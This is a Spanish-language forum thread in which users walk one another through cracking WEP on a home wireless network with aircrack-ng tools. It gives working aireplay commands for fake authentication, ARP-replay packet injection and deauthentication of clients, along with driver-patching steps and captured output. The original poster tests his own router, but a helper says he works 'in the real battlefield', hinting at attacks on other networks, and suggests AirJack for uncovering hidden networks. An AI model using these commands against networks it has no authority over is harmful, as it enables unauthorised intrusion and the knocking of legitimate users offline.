Todo sobre inyeccion de trafico con linux

[miliet]

Hola:
Estoy haciendo pruebas en la red de mi casa. La tengo encriptada con WEP 64 bits. Estoy siguiendo un video que postearon por aquí recientemente de como crackearla. El airodump me funciona bien. Lo pongo a escuchar en el canal correspondiente y  me detecta la red, pero a la hora de usar el aireplay, no consigo que me inyecte ni un solo paquete IV. En la secuencia del comando del aireplay meto el bssid del AP y  la  mac de la tarjeta que pongo es un fake 0:1:2:3:4:5.
Todo esto lo estoy haciendo desde un portátil. El ap lo tengo  conectado por red a un PC sobremesa. Por tanto no hay tráfico wireless. Mi gran duda es ¿si no hay tráfico wifi circulando es imposible inyectar paquetes?
Gracias, un saludo

[eltitoneo]

Exacto, si no hay nadie conectado no puedes inyectar tráfico.

[miliet]

Hola:
Gracias por la aclaración, me imaginaba  que sería por esto.  Como no tengo otro portátil con medios wifi para que trabaje normalmente y se genere tráfico, ¿existe algún programa que me permita emitir paquetes wifi desde el pc de sobremesa conectado al router por cable rj-45?
Un saludo

[Hwagm]

La mejor forma para la reinyeccion de trafico es el ataque 3 y este necesita un cliente, pero hay otra posibilidad dificil pero no imposible.
Puedes probar los siguiente:

Ataque 1: falsificando un cliente.

Como asi:

Código:

aireplay -1 0 -e "nombre essid "  -a  direccion mac punto acceso -h 0:1:2:3:4:5 ath0

12:14:06  Sending Authentication Request
12:14:06  Authentication successful
12:14:06  Sending Association Request
12:14:07  Association successful :-)

Algunos puntos de acceso renesitan una reasociación cada 30 segundos si no el cliente flaseado se considera desconectadp. en este caso:

Código:

aireplay -1 30 -e "nombre essid "  -a  direccion mac punto acceso -h 0:1:2:3:4:5 ath0

a la vez pones el airodump a trabajar en el mismo canal y la opcion 1 para grbar los IVS

airodump  (tuinterface) nombrefichero channel 1

al poco tiempo veras en la pantalla del airodump un cliente tipo 0:1:2:3:4:5 que seras el asociado falseado.
Si desaparece enseguida pon el 30.

Si no consigues el Association successful  y se queda en  Sending Authentication Request no podras seguir.

Si lo has conseguido entonces pasa al ataque 3:

Código:

aireplay -3 -b m direccion_bssid_punto _acceso -h 0:1:2:3:4:5 (tuinterface)
Saving ARP requests in replay_arp-0627-121526.cap
You must also start airodump to capture replies.
Read 2493 packets (got 1 ARP requests), sent 1305 packets...

Asi podras con la reinyeccion.

Recuerda de instalar el aircrack beta 12 y instalar el driver parcheado.

Para parchearla:

Código:

ifconfig eth1 down
rmmod prism54 2>/dev/null
cd /usr/src
wget http://100h.org/wlan/linux/prismgt/prism54-svn-20050724.tgz
wget http://100h.org/wlan/linux/patches/prism54-svn-20050724.patch
tar -xvzf prism54-svn-20050724.tgz
cd prism54-svn-20050724
patch -Np1 -i ../prism54-svn-20050724.patch
make modules && make install
wget http://100h.org/wlan/linux/prismgt/1.0.4.3.arm
mkdir -p /usr/lib/hotplug/firmware
mkdir -p /lib/firmware
cp 1.0.4.3.arm /usr/lib/hotplug/firmware/isl3890
mv 1.0.4.3.arm /lib/firmware/isl3890
depmod -a

¿Tienes la mejor tarjeta del mundo pero yo pensaba que era con el chipset de atheros seguro que es la v1.?

Mira el aircrack beta 12:

My favourite card is the Netgear WAG511, which is Atheros-based and has excellent sensitivity (no external antenna connector though); a cheaper version is the WG511T (PCMCIA) / WG311T (PCI). Another nice Atheros card is the Proxim 8470-WD, this one has an external MC antenna connector. Also, the DWL-G650/G650M is quite cheap (either rev. B or C, but do not buy the DWL-650+ which has a TI chipset); the PCI equivalent is the DWL-G520 (likewise, don't buy the G520+).

Pero al ser prism gt mira lo que dice:
Do NOT buy anything that might have a PrismGT chipset. Some time hago, Connexant decided to stop manufacturing their FullMAC chipset and released a cheap, crippled-down version known as "SoftMAC", which is totally incompatible with the prism54 driver.

Connexant has not been cooperative at all with the prism54 project, so they don't deserve any of your money. As a matter of fact, FullMAC cards are not being sold anymore -- you'll only find crappy SoftMAC in retail. In particular, do not buy the WG511 (v2 / v3), the 3CRWE154G72 (v2 / v3), the SMC2835W (v3), the SMC2802W (v2) or the ZyAIR G-300 (v2 / v3).

Tambien prueba:

dmesg -n 1

y

Código:

airmon.sh start (tuinterface)

Interface       Chipset         Driver

tuinterface         PrismGT         nombredriver (monitor mode enabled)

¿SEGURO QUE ES EL CHIPSET PRISM GT?

[miliet]

Hola Hwagm:
Estos ataques ya los he probado, pero quizá esté el fallo en que no tengo el driver parcheado. Estoy  intentandolo desde AUDITOR  150405 instalado en HD.  También voy  a revisar la versión del aircrack.
Efectivamente, la tarjeta en una NETGEAR WG511 rev1 con chipset PRISMGT. También había leido lo que me pones del aircrack, pero por lo que deduzco estas tarjetas (las v1) son FULLMAC y permiten la inyeccion de paquetes. Si ejecuto lspci:

0000:06:00.0 Network controller: Intersil Corporation Intersil ISL3890 [Prism GT/Prism Duette] (rev 01)

Por último, existe algún programa que permita emitir paquetes wifi desde un ordenador conectado al router por cable?

Gracias, un saludo.

[Hwagm]

Pues parchealo y compila el driver. Si no lo parcheas olvidate dela inyeccion.
Tienes las fuentes en ese auditor verdad.

A pesar de toda la informacion la mejor manera es probar las cosas, pero sigue la forma de parchear el driver sino ya te lo digo no puedes hacer nada.

Parchea el driver y luego ya veras si vale o no vale pero eso lo primero.

Con ese auditor puedes instalar modulo, es decir no es comoel ultimo que no tenemos las fuentes tu si verdad?. Pues parchealo.

La pregunta del programa no tiene sentido, si en tu caso ya que son pruebas de laboratorio pero no en el campo de batalla, ten claro esto, yo solo trabajoo en campo de batalla real.

No tiene sentido lo que dices ya que la comunicación por cable no va a llevar ningun IVS, se por donde vas, pero el enlace propiamente fisico entre cableado y wireless son difrentes.

Prueba a parchearlo y haz el ataque 1 y luego el 3.

[miliet]

Hola:   
Pero que desastre es este Auditor!!! La versión que te he dicho no tiene ni fuentes ni kernel-headers ni nada que permita compilar drivers. Tampoco la última versión que me acabo de instalar, la 200605 ipw2100. Me parece que voy a instalar todos los programas necesarios en mi kanotix y desde ahi probarlo todo.

Un saludo.

[miliet]

Hola de nuevo:
He probado en mi kanotix con el airodump y el aireplay (todavía no he parcheado el driver) y obtengo esto:

root@box:/home/miliet# aireplay -1 30 -e "Wireless" -a BSSID AP -h 0:1:2:3:4:5 eth0
14:20:18  Sending Authentication Request
14:20:18  Authentication successful
14:20:18  Sending Association Request
14:20:18  Association successful :-)
14:20:33  Sending keep-alive packet
14:20:48  Sending Authentication Request
14:20:48  Authentication successful
14:20:48  Sending Association Request
14:20:48  Association successful :-)
14:21:03  Sending keep-alive packet
14:21:18  Sending Authentication Request
14:21:18  Authentication successful
14:21:18  Sending Association Request
14:21:23  Sending Authentication Request
14:21:23  Authentication successful
14:21:23  Sending Association Request
14:21:28  Sending Authentication Request
14:21:28  Authentication successful
14:21:28  Sending Association Request
14:21:28  Denied (code 12), ESSID rejected ?
14:21:31  Sending Authentication Request
14:21:31  Authentication successful

Entiendo que cuando llega a la linea que he marcado con negrita tengo que cortar con ctrl+c para no dejar que siga, no? Porque después, al hacer:

root@box:/home/miliet# aireplay -3 -b bssid AP -h 0:1:2:3:4:5 eth0
ioctl(RTC_IRQP_SET) failed: Invalid argument
Make sure enhanced rtc device support is enabled in the kernel (module
rtc, not genrtc) - also try 'echo 1024 >/proc/sys/dev/rtc/max-user-freq'.
Saving ARP requests in replay_arp-0801-142505.cap
You must also start airodump to capture replies.
Read 514 packets (got 0 ARP requests), sent 0 packets...

No consigo que me envíe ningún paquete. Creo que voy por buen camino, no?
Ahora solo falta parchear el driver.   8)

[yadnus]

Lo que le dices con aireplay -1 30  ... es que de reconecte cada 30 segundos o sea que lo hace bien , eso viene como te ha comentado antes hwagm porque algunos AP si ven que no das señales de vida en los últimos 30 segundos entienden que te has desconectado con lo que ya no estarías asociado y no recibirían tus paquetes inyectados, eso no pasa con todos asi que si le pones aireplay -1 0 ... para que solo lo haga una vez lo mismo cuela igual.

El error que te da despues yo diría que es por no parchear el driver.

[Hwagm]

Bien pasamos del auditor independientemente si era una version y/o tra. Hasta ahi bien

El ataque 1 lo haces bien y no hay que cortar pero lo de 30, solo es para algunos primero se prueba con 0, y se mira en el airodump que relamente este autentificado pero despues de esperar un ratito.

Sino parcheas olvidate, esto que te quede claro, ademas el aireplay ya te lo dice, Asi que parchealo.

Despues de parcheralo compruebalo con:

dmesg -n 1
es importante
y

airmon.sh start (tuinterface) (opcioncanal)
es importante
Interface       Chipset         Driver

tuinterface         PrismGT         nombredriver (monitor mode enabled)

Usa la versión beta 12.

Si todo esta bien no quiere decir que funcione a la primera, puede fallar si la distacia es demasiado lejana. Pero es como es tu router propio pues todo lo contrario separalo.

PERO PARCHEALO.

ifconfig eth1 down
rmmod prism54 2>/dev/null
igual aqui se te bloquea el pc , pues reinicia y pasas de ella

cd /usr/src
wget http://100h.org/wlan/linux/prismgt/prism54-svn-20050724.tgz

esto se puede omitir si ya lo has bajado.
wget http://100h.org/wlan/linux/patches/prism54-svn-20050724.patch

este ya esta incluido en el beta 12

tar -xvzf prism54-svn-20050724.tgz
cd prism54-svn-20050724
patch -Np1 -i ../prism54-svn-20050724.patch
make modules && make install

wget http://100h.org/wlan/linux/prismgt/1.0.4.3.arm

mkdir -p /usr/lib/hotplug/firmware
mkdir -p /lib/firmware
cp 1.0.4.3.arm /usr/lib/hotplug/firmware/isl3890
mv 1.0.4.3.arm /lib/firmware/isl3890
depmod -a
comprueba antes de colocar el firmware que en:

/etc/hotplug/firmware.agent te apunte a :
FIRMWARE_DIR=/lib/hotplug/firmware
y que  /usr/lib/hotplug/firmware te apunte al mismo sitio


patch -Np1 -i ../prism54-svn-20050724.patch
esto es lo que ves raro verdad pues te lo explico ../:

realmente ahi que poner la ruta.
Por ejemplo yo lo tengo en:
/home/halcon/      el aircrack descomprimido pues entonces seria:


patch -Np1 -i /home/halcon/aircrack-2.2-beta12/linux/patch/prism54-svn-20050724.patch

Y como todo tiene truco, no entres en tu linux como usuario sino como root, desde lo primero y trabajaras mejor y colocas cada cosa donde te dicen.

Y ademas colocas el airrcack dentro del directorio root y solo tendras que poner:

patch -Np1 -i ~/aircrack-2.2-beta12/linux/patch/prism54-svn-20050724.patch

Hazlo como quieras pero despues de del patch te tiene que dar un aviso que se han parcheado. Y recuerda de trabajar solo el canal que elijas para esa señal.

Como puedes probar y tienes una buen tarjeta lo siguiente sera usar las herramientas de Airjack, en concreto la tools essid_jack para pillar essid ocultos . Yo tengo una atheros y me da problemas al instalarlo. Pero quiero saber si los problemas son por que no tengo ese chipset o porque me falta algo mas, asi que tu podras probar y me ayudaras si puedes con eso.

[miliet]

Hola:
Gracias por la ayuda a todos, efectivamente he parcheado y ha empezado a inyectar paquetes como un loco. Lo que pasa es que se me ha detenido en 76000. No se muy bien el motivo porque me he ido a la playa y lo he dejado enchufado. Se que son pocos paquetes para el aircrack, pero de todas formas lo estoy probando a ver si revienta la clave.
Hwagm, siempre trabajo en root, porque para el tema de los permisos a la hora de instalar y tal, es mucho más cómodo. No me olvido de probar las airjack tools. Esta noche me pondré a ello con calma y ya te informo. Otra cosa, también tengo una Conceptronic C54RC (chipset rt2500)  y por lo que he leido ya se puede inyectar con ella. Mi primera tarjeta, lo que me ha costado domarla!! Quiero también intentar la inyección de paquetes, me imagino que para parchear el driver será lo mismo que con el prism54, no??

Un saludo y gracias de nuevo. 

[Hwagm]

Bueno son pocos pero antes tenias cero patatero, la cosa funciona.

Otra cosa es que luego la inyeccion sea correcta y no te salga la clave, ficheros corruptos y cosas de esas, pero vas en buen camino.
Me alegro que te haya servido de ayuda.
Si te se para a 76000 con el -x 1000 metele mas con el ataque 3. Si no control+c en el sending y vuelta a empezar es decir atacale por todos los lados.

Tranquilo no hay prisa con el Airjack.

joder tio de donde sacas las tarjetas.

Segun la información del aircrack, si puedes usar la ralink, y el parcheado aun es mas facil.

ifconfig ra0 down
rmmod rt2500 2>/dev/null
lo de siempre

cd /usr/src
wget http://100h.org/wlan/linux/ralink/rt2500-cvs-20050724.tgz

si lo tienes por otro lado no hace falta, ya lo sabes

wget http://100h.org/wlan/linux/patches/rt2500-cvs-20050724.patch

no te hace falta ya que sabes que esta en el beta12 de forma directa, lo que pasa es que no han actualizado el readme.

Lo demas como siempre:

tar -xvzf rt2500-cvs-20050724.tgz
cd rt2500-cvs-20050724
patch -Np1 -i ../rt2500-cvs-20050724.patch
cd Module
make && make install
modprobe rt2500

y recuerda el mismo rollo para la ruta: ../ como lo de antes para la gt.

Este es mas facil ya que no necesitas la m. del firmware.

Y recuerda:

airmon.sh start ra0 (opcioncanal)
es importante

Interface       Chipset         Driver

rao            ralink          rt2500"nombredriver" (monitor mode enabled)


dmesg -n 1

Con esta podras comprobar si inyecta a 11b o 11g.

iwpriv rao mode 2 (capada a 11M)
iwpriv ra0 mode 0  (b/g)

esto que puse solo es valido para la atheros cuando no puede inyectar en 54M.
Si lo haceis con ra0 os dara un error

Con el ataque 1 y 3 es mas complicado, si tuvieras la suerte de pillar un cliente asociado verias como pasa de 2500 IVS por minuto a 6.000.000 en un par de horas, es una pasada.
Como es tu router pues ya sabes con una la pones a trabajar de forma normal y la otra con inyección. Veras que bien.

El problema es que a veces usar 2 tarjetas levantadas en el mismo pc es problematico, es decir aunque una este en modo mnitor y la otra navegando por internet, se que en algunos casos ha dado problemas y se ha tenido que bajar una, con lo cual ya no lo verias, bueno el caso que tienes opciones varias para jugar.

Si consgues otro pc aunque sea un cacharro, pruebalo y vas a flipar.
Bueno mas todavia si es en batalla real.

Suerte y a por el toro.
Si te lias con el Airjack dejalo,  ya conseguira algun dia una prism,  Joder no tengo tiempo, el futuro usurpador de la casa ya se lo lleva.


Pero recuerda que la reinyección no siempre te da lo que esperas me refiero que si luego con el aircrack ves numeros negativos y numeros muy repetidos, y no te la da con factor 1 y/o 2 aunque tengas varios millones, pues gato gato, pero eso es otra historia.

[miliet]

Hola de nuevo:
Voy a intentar dentro de un ratillo con el airjack. Tengo descargada la version 0.6.6b-alpha. No se si habrá alguna más moderna.
Lo de las tarjetas, pues bueno, es una historieta. Primero pillé la Conceptronic y la tuve funcionando mucho tiempo en debian sid en un portátil muy viejo (toshiba pentium mmx 233mhz 160mb RAM) pero conseguí vender el artilugio y ahora tengo un acer aspire 1360. Lleva incorporada una inalámbrica, pero con esta no hay nada que hacer, es una INPROCOMM IPN 2220. Como andaba con ganas de cacharrear y todavía no había nada para la conceptronic, solo kismet, pues me decidí a comprar la NETGEAR WG511. La primera que compré fue en una tienda por internet, y me fié de la foto que tenían. Solo valen las de carcasa plateada (v1) así que la pedí y MURPHY entró en acción. Me mandaron la v2(chipset MARVELL, carcasa negra). Total, que la he devuelto y le he comprado la buena (chipset PRISMGT) por ebay a un chaval de Inglaterra, y estoy más contento que unas castañuelas. Si quieres pillar una de estas, creo que hay alguna tienda en GB que las tienen por ebay y nada caras.
Bueno, me voy a poner a currar, que la noche va a ser larga!! 

Un saludo.

--------------------------------------------------------------------------------------------
Que melón soy. Comiendome la cabeza y tenia la solución ahí delante. Hasta que no he vuelto a releer tu post, Hwagm, no me he dado cuenta que el portátil tiene dos ranuras PCMCIA. Acabo de probarlo y me va de PM con la ralink trabajando y la netgear operando. Así aumentan mucho las posibilidades.
Por otra parte, el ataque 1 me funciona perfectamente metiendo el fake 0:1:2:3:4:5 pero el 3 no siempre. No consigo inyectar siempre el tráfico. Esto por qué puede ser? Otra cosa, si tengo la ralink trabajando en la red, puedo hacer los ataques 1 y 3 metiendo su MAC? Lo echaría de la red?
Gracias nuevamente.

[Hwagm]

Como tienes 2 es decir una como cliente autentico indepedientemente de la que sea.

Solo trabaja con el ataque 3 y no hecharas a nadie.

Es decir una opera normal y con la otra vas esnifando.
Solo que en lugar de poner 0:1:2:3:4:5 tendras que poner la mac con la que esta trabajando.

En este cado no uses el ataque 1,

para que fucnona el 3, no te pongas muy cerca del router pero lo suficiente para que puedas usar la conexión normal.
La conexión normal empieza a bajar ficheros grande de la red tales como una imagen *.iso o lo que quieras.

Lo que no se si estas dos tarjetas pueden trabajar solo en modo g, asi  que primero con b, y luego sigues.

El orden que yo haria seria este:

1.- Un tarjeta conexión normal y bajo cosas de la red. Que trabaje solo con el router a 11M.
2.- La otra reinyectando.Y empiza con clave de 64bits.

Tio tienes todas las acciones que quieras para probar.

Lo ideal seria un tercer equipo pero bueno con este puedes probar todo lo que quieras.

El ataque uno solo se usa para casos cuando no hay clientes pero tu eres el cliente, asi que puedes probar lo que quieras, es decir no tendras tiempo para verlo todo, de las posibiliades que tienes. Para quitar un equipo asociado y espera a que este se vuelva a conectar y asi cojer mas IVS para la reinyeccion tambien lo puedes probar pero este ataque es otro. este es el cero, osea no te preocupes con el 3 y el 1 con esos no quitas a nadie.

ejemplo de ataque 0 con ralink:

airmon.sh start ra0
aireplay -0 0 -a 00:13:10:30:24:9C ra0

donde 00:13:10:30:24:9C es el ap (router)
O sea tu mismo te desconectas, y si te das prisa incluso vers como te se para lo que te estes bajando, luego se recupera y es ahi donde se pillan los ivs para la reinyeccion. Por lo que tambien se usa en conjunto el 3.
Es decir como hay poco trafico cortas el enlace para generarlo al reasociarse, pillas.

Vamos puedes probar lo que quieras.

[miliet]

Hola de nuevo: 

Esto funciona!!!! En principio estoy con WEP 64bits, y las tarjetas en g y ataque 3 solamente y parece que todo va correcto. Está inyectando paquetes como un loco. Es que estaba trabajando a menos de 1/2 metro del AP!! Ha sido separarme y un chorrete como un cañón ha empezado a meterse en el airodump. Con el ataque 1 y 3 combinado no lo tengo muy claro. A veces inyecta y otras no. Y de repente se para. Seguiré investigando.
Bueno, en cuanto pula un poco esta técnica me pongo con el airjack y a hacer cosillas más complicadas.

Un saludo